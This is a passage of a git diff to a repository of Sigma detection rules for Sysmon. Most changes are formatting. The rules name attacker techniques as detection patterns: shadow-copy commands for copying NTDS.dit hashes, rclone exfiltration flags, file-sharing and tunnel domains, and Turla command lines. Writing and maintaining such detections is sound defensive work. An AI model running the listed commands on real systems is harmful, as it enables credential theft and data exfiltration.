@@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /vss ' - ' /y ' condition: process_creation and selection diff --git a/sigma/sysmon/deprecated/win_susp_rclone_exec.yml b/sigma/sysmon/deprecated/win_susp_rclone_exec.yml index 9816b1c37..6123b7c99 100644 --- a/sigma/sysmon/deprecated/win_susp_rclone_exec.yml +++ b/sigma/sysmon/deprecated/win_susp_rclone_exec.yml @@ -27,7 +27,7 @@ detection: - \PowerShell.exe - \cmd.exe command_selection: - CommandLine|contains: + CommandLine|contains: - ' pass ' - ' user ' - ' copy ' @@ -39,6 +39,5 @@ detection: - ' ls ' description_selection: Description: Rsync for cloud storage - condition: process_creation and (command_selection and ( description_selection - or exec_selection )) + condition: process_creation and (command_selection and ( description_selection or exec_selection )) ruletype: Sigma diff --git a/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml b/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml index e7331443c..cb51165dd 100644 --- a/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml +++ b/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml @@ -1,8 +1,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd status: deprecated -description: Detects suspicious commands that could be related to activity that uses - volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely +description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely author: Florian Roth (Nextron Systems), Michael Haag date: 2019/01/16 modified: 2022/04/11 @@ -24,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: + CommandLine: - vssadmin.exe Delete Shadows - 'vssadmin create shadow /for=C:' - copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit diff --git a/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml b/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml index ac9e926bb..d8ead3266 100644 --- a/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml +++ b/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml @@ -1,11 +1,10 @@ title: DNS Query for Anonfiles.com Domain - Sysmon id: 065cceea-77ec-4030-9052-fc0affea7110 related: - - id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 - type: similar + - id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 + type: similar status: test -description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload - platform often used for malicious purposes +description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: pH-T (Nextron Systems) diff --git a/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml b/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml index cd1997c9a..aca0dec62 100644 --- a/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml +++ b/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml @@ -1,14 +1,11 @@ title: AppX Package Installation Attempts Via AppInstaller.EXE id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a related: - - id: 180c7c5c-d64b-4a63-86e9-68910451bc8b - type: derived + - id: 180c7c5c-d64b-4a63-86e9-68910451bc8b + type: derived status: test -description: 'Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is - the default handler for the "ms-appinstaller" URI. It attempts to load/install - a package from the referenced URL - - ' +description: | + Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL references: - https://twitter.com/notwhickey/status/1333900137232523264 - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ diff --git a/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml b/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml index 0f243b099..e82078c1e 100644 --- a/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml +++ b/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml @@ -1,17 +1,15 @@ title: DNS Query To Devtunnels Domain id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b related: - - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 - type: similar - - id: 4b657234-038e-4ad5-997c-4be42340bce4 - type: similar - - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 - type: similar + - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels + type: similar + - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode + type: similar + - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode + type: similar status: experimental -description: 'Detects DNS query requests to Devtunnels domains. Attackers can abuse - that feature to establish a reverse shell or persistence on a machine. - - ' +description: | + Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2 - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security diff --git a/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml b/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml index 64f72e837..b29321774 100644 --- a/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml @@ -34,8 +34,9 @@ detection: filter_optional_azure: Image|startswith: C:\WindowsAzure\GuestAgent filter_main_null: - Image: null + Image: filter_optional_browsers: + # Note: This list is for browsers installed in the user context. To avoid basic evasions based on image name. Best to baseline this list with the browsers you use internally and add their full paths. Image|endswith: - \chrome.exe - \firefox.exe @@ -43,5 +44,6 @@ detection: condition: dns_query and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Likely +# Note: Incrase the level once a baseline is established level: low ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml b/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml index 50ea8b128..be5816914 100644 --- a/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml +++ b/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml @@ -1,8 +1,7 @@ title: DNS HybridConnectionManager Service Bus id: 7bd3902d-8b8b-4dd4-838a-c6862d40150d status: test -description: Detects Azure Hybrid Connection Manager services querying the Azure service - bus service +description: Detects Azure Hybrid Connection Manager services querying the Azure service bus service references: - https://twitter.com/Cyb3rWard0g/status/1381642789369286662 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -24,7 +23,6 @@ detection: Image|contains: HybridConnectionManager condition: dns_query and selection falsepositives: - - Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus - service + - Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service level: high ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml b/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml index 17b06267b..88e4f5ddc 100644 --- a/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml +++ b/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml @@ -1,11 +1,10 @@ title: Suspicious Cobalt Strike DNS Beaconing - Sysmon id: f356a9c4-effd-4608-bbf8-408afd5cd006 related: - - id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 - type: similar + - id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 + type: similar status: test -description: Detects a program that invoked suspicious DNS queries known from Cobalt - Strike beacons +description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ diff --git a/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml b/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml index 93c7e38eb..e77de6cab 100644 --- a/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml +++ b/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml @@ -1,8 +1,8 @@ title: DNS Query To MEGA Hosting Website id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 related: - - id: 66474410-b883-415f-9f8d-75345a0a66a6 - type: similar + - id: 66474410-b883-415f-9f8d-75345a0a66a6 + type: similar status: test description: Detects DNS queries for subdomains related to MEGA sharing website references: diff --git a/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml b/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml index 52c981222..d916291d1 100644 --- a/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml @@ -1,8 +1,8 @@ title: DNS Query Request By Regsvr32.EXE id: 36e037c4-c228-4866-b6a3-48eb292b9955 related: - - id: c7e91a02-d771-4a6d-a700-42587e0b1095 - type: derived + - id: c7e91a02-d771-4a6d-a700-42587e0b1095 + type: derived status: test description: Detects DNS queries initiated by "Regsvr32.exe" references: diff --git a/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml b/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml index 98c78d96e..25ef76abf 100644 --- a/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml +++ b/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml @@ -1,25 +1,17 @@ title: DNS Query To Remote Access Software Domain From Non-Browser App id: 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 related: - - id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f - type: obsoletes - - id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d - type: obsoletes - - id: ed785237-70fa-46f3-83b6-d264d1dc6eb4 - type: obsoletes + - id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f + type: obsoletes + - id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d + type: obsoletes + - id: ed785237-70fa-46f3-83b6-d264d1dc6eb4 + type: obsoletes status: experimental -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows @@ -69,14 +61,14 @@ detection: - logmeincdn.http.internapcdn.net - n-able.com - net.anydesk.com - - netsupportsoftware.com + - netsupportsoftware.com # For NetSupport Manager RAT - parsecusercontent.com - pubsub.atera.com - relay.kaseya.net - relay.screenconnect.com - relay.splashtop.com - remotedesktop-pa.googleapis.com - - remoteutilities.com + - remoteutilities.com # Usage of Remote Utilities RAT - secure.logmeinrescue.com - services.vnc.com - static.remotepc.com @@ -85,9 +77,11 @@ detection: - telemetry.servers.qetqo.com - tmate.io - zohoassist.com - selection_rustdesk: + selection_rustdesk: # https://twitter.com/malmoeb/status/1668504345132822531?s=20 and https://www.adamsdesk.com/posts/rustdesk-not-connecting/ mention this pattern QueryName|endswith: .rustdesk.com QueryName|startswith: rs- + # Exclude browsers for legitimate visits of the domains mentioned above + # Add missing browsers you use and exclude the ones you don't filter_optional_chrome: Image: - C:\Program Files\Google\Chrome\Application\chrome.exe @@ -101,11 +95,11 @@ detection: - C:\Program Files (x86)\Internet Explorer\iexplore.exe - C:\Program Files\Internet Explorer\iexplore.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -117,8 +111,8 @@ detection: Image|endswith: \safari.exe filter_optional_defender: Image|endswith: - - \MsMpEng.exe - - \MsSense.exe + - \MsMpEng.exe # Microsoft Defender executable + - \MsSense.exe # Windows Defender Advanced Threat Protection Service Executable filter_optional_brave: Image|endswith: \brave.exe Image|startswith: C:\Program Files\BraveSoftware\ @@ -174,7 +168,6 @@ detection: Image|endswith: \avant.exe condition: dns_query and (1 of selection_* and not 1 of filter_optional_*) falsepositives: - - Likely with other browser software. Apply additional filters for any other browsers - you might use. + - Likely with other browser software. Apply additional filters for any other browsers you might use. level: medium ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml b/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml index a08f884a7..4bc783a2f 100644 --- a/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml +++ b/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml @@ -1,8 +1,7 @@ title: Suspicious DNS Query for IP Lookup Service APIs id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 status: test -description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating - from a non browser process. +description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process. references: - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon - https://twitter.com/neonprimetime/status/1436376497980428318 @@ -74,11 +73,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ diff --git a/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml b/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml index 530b9d9ae..91f2c98f9 100644 --- a/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml +++ b/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml @@ -1,9 +1,7 @@ title: TeamViewer Domain Query By Non-TeamViewer Application id: 778ba9a8-45e4-4b80-8e3e-34a419f0b85e status: test -description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer - client by an image that isn't named TeamViewer (sometimes used by threat actors - for obfuscation) +description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) references: - https://www.teamviewer.com/en-us/ author: Florian Roth (Nextron Systems) @@ -25,11 +23,11 @@ detection: - taf.teamviewer.com - udp.ping.teamviewer.com filter_main_teamviewer: + # Note: To avoid evasion based on similar names. Best add full install location of TeamViewer Image|contains: TeamViewer condition: dns_query and (selection and not 1 of filter_main_*) falsepositives: - Unknown binary names of TeamViewer - - Depending on the environment the rule might require some initial tuning before - usage to avoid FP with third party applications + - Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications level: medium ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml b/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml index ac5a36039..5e2d4f513 100644 --- a/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml @@ -1,8 +1,8 @@ title: DNS Query Tor .Onion Address - Sysmon id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 related: - - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 - type: similar + - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 + type: similar status: experimental description: Detects DNS queries to an ".onion" address related to Tor routing networks references: diff --git a/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml b/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml index ea602f0a1..114d0cdce 100644 --- a/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml @@ -1,11 +1,10 @@ title: DNS Query To Ufile.io id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b related: - - id: 090ffaad-c01a-4879-850c-6d57da98452d - type: similar + - id: 090ffaad-c01a-4879-850c-6d57da98452d + type: similar status: experimental -description: Detects DNS queries to "ufile.io", which was seen abused by malware and - threat actors as a method for data exfiltration +description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ author: yatinwad, TheDFIRReport @@ -26,7 +25,6 @@ detection: QueryName|contains: ufile.io condition: dns_query and selection falsepositives: - - DNS queries for "ufile" are not malicious by nature necessarily. Investigate - the source to determine the necessary actions to take + - DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take level: low ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml b/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml index 66f50f215..568a67434 100644 --- a/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml +++ b/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml @@ -1,17 +1,15 @@ title: DNS Query To Visual Studio Code Tunnels Domain id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 related: - - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 - type: similar - - id: 4b657234-038e-4ad5-997c-4be42340bce4 - type: similar - - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b - type: similar + - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels + type: similar + - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode + type: similar + - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels + type: similar status: experimental -description: 'Detects DNS query requests to Visual Studio Code tunnel domains. Attackers - can abuse that feature to establish a reverse shell or persistence on a machine. - - ' +description: | + Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html diff --git a/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml b/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml index 5d3acb8c3..e5afd15fd 100644 --- a/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml +++ b/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml @@ -91,10 +91,7 @@ detection: - \5a4fe297c7d42539303137b6d75b150d.sys condition: driver_load and selection falsepositives: - - False positives may occur if one of the vulnerable driver names mentioned above - didn't change its name between versions. So always make sure that the driver - being loaded is the legitimate one and the non vulnerable version. - - If you experience a lot of FP you could comment the driver name or its exact - known legitimate location (when possible) + - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version. + - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible) level: medium ruletype: Sigma diff --git a/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml b/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml index a4e5e08bf..d51d1d28d 100644 --- a/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml +++ b/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml @@ -1,8 +1,8 @@ title: PUA - Process Hacker Driver Load id: 67add051-9ee7-4ad3-93ba-42935615ae8d related: - - id: 10cb6535-b31d-4512-9962-513dcbc42cc1 - type: similar + - id: 10cb6535-b31d-4512-9962-513dcbc42cc1 + type: similar status: experimental description: Detects driver load of the Process Hacker tool references: @@ -38,7 +38,6 @@ detection: - 6E7B34DFC017700B1517B230DF6FF0D0 condition: driver_load and (1 of selection_*) falsepositives: - - Legitimate use of process hacker or system informer by developers or system - administrators + - Legitimate use of process hacker or system informer by developers or system administrators level: high ruletype: Sigma diff --git a/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml b/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml index d33ee5e31..990ad0a43 100644 --- a/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml +++ b/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml @@ -1,8 +1,8 @@ title: PUA - System Informer Driver Load id: 10cb6535-b31d-4512-9962-513dcbc42cc1 related: - - id: 67add051-9ee7-4ad3-93ba-42935615ae8d - type: similar + - id: 67add051-9ee7-4ad3-93ba-42935615ae8d + type: similar status: experimental description: Detects driver load of the System Informer tool references: @@ -55,7 +55,6 @@ detection: - 3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138 condition: driver_load and (1 of selection_*) falsepositives: - - System Informer is regularly used legitimately by system administrators or developers. - Apply additional filters accordingly + - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml b/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml index bc231aa80..2198b4a74 100644 --- a/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml +++ b/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml @@ -21,7 +21,6 @@ detection: ImageLoaded|contains: \Temp\ condition: driver_load and selection falsepositives: - - There is a relevant set of false positives depending on applications in the - environment + - There is a relevant set of false positives depending on applications in the environment level: high ruletype: Sigma diff --git a/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml b/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml index fd3bdc4f5..d08405271 100644 --- a/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml +++ b/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml @@ -1,8 +1,7 @@ title: Vulnerable Driver Load By Name id: 72cd00d6-490c-4650-86ff-1d11f491daa1 status: experimental -description: Detects the load of known vulnerable drivers via the file name of the - drivers. +description: Detects the load of known vulnerable drivers via the file name of the drivers. references: - https://loldrivers.io/ author: Nasreddine Bencherchali (Nextron Systems) @@ -297,10 +296,7 @@ detection: - \iqvw64e.sys condition: driver_load and selection falsepositives: - - False positives may occur if one of the vulnerable driver names mentioned above - didn't change its name between versions. So always make sure that the driver - being loaded is the legitimate one and the non vulnerable version. - - If you experience a lot of FP you could comment the driver name or its exact - known legitimate location (when possible) + - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version. + - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible) level: low ruletype: Sigma diff --git a/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml b/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml index 2f7ea46e6..95566e7d9 100644 --- a/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml +++ b/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml @@ -1,9 +1,7 @@ title: Vulnerable HackSys Extreme Vulnerable Driver Load id: 295c9289-acee-4503-a571-8eacaef36b28 status: test -description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally - vulnerable Windows driver developed for security enthusiasts to learn and polish - their exploitation skills at Kernel level and often abused by threat actors +description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors references: - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver author: Nasreddine Bencherchali (Nextron Systems) @@ -24,12 +22,12 @@ detection: ImageLoaded|endswith: \HEVD.sys selection_sysmon: Hashes|contains: - - IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5 - - IMPHASH=c46ea2e651fd5f7f716c8867c6d13594 + - IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5 # Version 3.0 + - IMPHASH=c46ea2e651fd5f7f716c8867c6d13594 # Version 3.0 selection_other: Imphash: - - f26d0b110873a1c7d8c4f08fbeab89c5 - - c46ea2e651fd5f7f716c8867c6d13594 + - f26d0b110873a1c7d8c4f08fbeab89c5 # Version 3.0 + - c46ea2e651fd5f7f716c8867c6d13594 # Version 3.0 condition: driver_load and (1 of selection*) falsepositives: - Unlikely diff --git a/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml b/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml index d68a85c7c..d828c917b 100644 --- a/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml +++ b/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml @@ -1,8 +1,7 @@ title: Vulnerable WinRing0 Driver Load id: 1a42dfa6-6cb2-4df9-9b48-295be477e835 status: test -description: Detects the load of a signed WinRing0 driver often used by threat actors, - crypto miners (XMRIG) or malware for privilege escalation +description: Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation references: - https://github.com/xmrig/xmrig/tree/master/bin/WinRing0 - https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/ diff --git a/sigma/sysmon/driver_load/driver_load_win_windivert.yml b/sigma/sysmon/driver_load/driver_load_win_windivert.yml index 30e5a4014..a8e41f135 100644 --- a/sigma/sysmon/driver_load/driver_load_win_windivert.yml +++ b/sigma/sysmon/driver_load/driver_load_win_windivert.yml @@ -1,8 +1,7 @@ title: WinDivert Driver Load id: 679085d5-f427-4484-9f58-1dc30a7c426d status: test -description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection - package for Windows +description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows references: - https://reqrypt.org/windivert-doc.html - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ @@ -26,6 +25,7 @@ detection: ImageLoaded|contains: - \WinDivert.sys - \WinDivert64.sys + # Other used names - \NordDivert.sys - \lingtiwfp.sys - \eswfp.sys diff --git a/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml b/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml index 32c116de3..eec70594b 100644 --- a/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml +++ b/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml @@ -26,7 +26,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: - zxFunction - RemoteDiskXXXXX condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml index 04d56ceb7..833342d8e 100644 --- a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml +++ b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml @@ -26,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: + CommandLine: - net use \\\\%DomainController%\C$ "P@ssw0rd" * - dir c:\\*.doc* /s - dir %TEMP%\\*.exe diff --git a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml index 2ed963093..205147a7f 100644 --- a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml +++ b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml @@ -23,12 +23,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli_1: - CommandLine|contains: + CommandLine|contains: - tracert -h 10 yahoo.com - .WSqmCons))|iex; - Fr`omBa`se6`4Str`ing selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - net use 